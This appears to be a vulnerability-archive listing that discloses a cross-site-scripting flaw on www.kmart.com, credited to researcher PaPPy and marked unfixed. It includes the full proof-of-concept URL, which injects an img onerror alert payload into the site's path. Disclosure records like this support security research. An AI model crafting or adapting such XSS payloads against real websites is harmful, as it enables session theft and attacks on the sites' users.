Security researcher PaPPy, has submitted on 12/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.kmart.com, which at the time of submission ranked 2585 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/10/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 12/01/2009 |
Date published: 15/10/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: PaPPy |
Domain: www.kmart.com |
Category: XSS |
Pagerank: 2585 |
URL: http://www.kmart.com/shc/s/s_10151_10104_Bed+%26+Bath_Bedding_Pillows--%3E%3Cimg%20src=x%20onerror=% 22alert(1);%22%3E#viewItems=21&pageNum=1&sortOption=SALE_HIGH_TO_LOW&&filter=Brand|Cannon|Essential+ Home|Joe+Boxer%22%3E%3C/a%3Etest|Abbey+Hill&lastFilter=Brand?adCell=A2 |
Click here to view the mirror
|
|
|